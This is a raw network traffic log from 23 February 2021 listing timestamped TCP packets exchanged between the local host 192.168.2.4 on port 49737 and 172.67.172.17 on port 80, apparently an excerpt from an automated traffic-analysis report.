Feb 23, 2021 15:30:33.026762962 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.026778936 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.026794910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.026810884 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.026830912 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.026890993 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.027565956 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.027585030 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.027601004 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.027620077 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.027637959 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.027651072 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.028373003 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.028407097 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.028434038 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.028459072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.028477907 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.028479099 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.028496027 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.028517962 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.028548002 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.029357910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.029426098 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.029443026 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.029462099 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.029479980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.029495001 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.029504061 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.029556990 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.030308962 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.030329943 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.030354977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.030374050 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.030392885 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.030400991 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.030411959 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.030462980 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.031287909 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.031310081 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.031335115 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.031354904 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.031373978 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.031395912 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.031421900 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.031466961 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.032242060 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.032263041 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.032282114 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.032300949 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.032320023 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.032339096 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.032365084 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.032460928 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.033233881 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.033256054 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.033282042 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.033318996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.033339977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.033359051 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.033868074 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.034128904 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.034151077 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.034172058 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.034190893 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.034212112 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.034233093 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.034251928 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.034279108 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.035068035 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.035190105 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.035228968 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.035248041 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.035268068 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.035285950 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.035303116 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.035304070 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.035324097 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.035362005 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.036176920 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.036273003 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.036294937 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.036315918 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.036334991 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.036345959 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.036354065 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.036375999 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.037075043 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.037101984 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.037123919 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.037142992 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.037162066 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.037168026 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.037182093 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.037214041 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.037997007 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.038023949 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.038047075 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.038065910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.038086891 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.038098097 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.038106918 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.038146973 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.038968086 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.038990021 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.039007902 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.039028883 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.039047956 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.039072037 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.039083958 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.039098978 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.039798021 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.039823055 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.039844990 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.039865017 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.039884090 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.039902925 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.039938927 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.039949894 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.040730000 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.040756941 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.040787935 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.040811062 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.040833950 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.040851116 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.040862083 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.040880919 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.040898085 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.041574955 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.041601896 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.041629076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.041651964 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.041682005 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.041695118 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.041721106 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.041729927 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.041750908 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.042562008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.042606115 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.042653084 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.042685986 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.042687893 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.042723894 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.042725086 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.042758942 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.042782068 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.043353081 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.043392897 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.043426991 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.043464899 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.043481112 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.043509007 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.043548107 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.043557882 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.043582916 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.044229031 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.044275045 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.044306993 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.044342041 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.044342995 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.044378042 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.044408083 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.044420004 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.044480085 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.045201063 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.045242071 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.045273066 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.045277119 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.045308113 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.045337915 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.045341969 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.045373917 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.045399904 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.045893908 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.045933008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.045972109 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.046005964 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.046006918 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.046040058 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.046046972 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.046075106 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.046091080 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.046725988 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.046765089 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.046798944 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.046835899 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.046844959 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.046869993 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.046894073 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.046910048 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.046916962 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.046947002 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.046996117 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.047667980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.047705889 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.047739983 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.047775030 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.047800064 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.047810078 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.047836065 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.047843933 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.047882080 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.047940016 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.048640966 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.048677921 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.048711061 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.048721075 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.048744917 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.048769951 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.048820019 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.048856020 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.048868895 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.048891068 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.049362898 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.049582005 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.049612999 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.049638033 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.049660921 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.049689054 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.049698114 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.049725056 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.049748898 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.049767971 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.049802065 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.050509930 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.050527096 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.050544977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.050560951 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.050578117 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.050597906 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.050609112 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.050616980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.050682068 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.051584959 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.051636934 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.051743031 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.159687042 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.214962959 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.513365030 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.513425112 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.513448954 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.513473988 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.513489008 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.513499022 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.513528109 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.513531923 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.513550997 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.513566971 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.513576031 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.513600111 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.513614893 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.513626099 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.513665915 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.518449068 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518481970 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518505096 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518521070 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518543005 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518563986 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518563986 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.518589020 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518604994 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.518610954 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518625021 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.518635988 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518647909 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.518657923 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518678904 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518698931 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518699884 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.518723011 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518745899 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518748999 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.518760920 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518781900 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518781900 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.518806934 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518826008 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.518830061 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518882036 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518883944 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.518907070 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518933058 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518955946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.518965960 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.518975973 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.519001007 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529092073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529124022 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529146910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529160976 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529169083 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529191971 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529196978 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529213905 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529237032 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529238939 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529267073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529288054 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529289961 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529316902 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529330969 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529345989 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529370070 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529398918 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529409885 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529433012 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529448986 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529457092 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529479980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529496908 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529506922 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529532909 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529548883 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529556036 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529582024 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529597998 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529604912 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529628038 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529649019 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529652119 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.529694080 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.529696941 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530174971 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530203104 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530222893 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.530225039 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530245066 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530268908 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530270100 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.530289888 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530312061 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.530314922 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530333996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530349016 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530577898 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.530642986 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530672073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530697107 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530718088 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.530723095 CET	80	49737	172.67.172.17	192.168.2.4
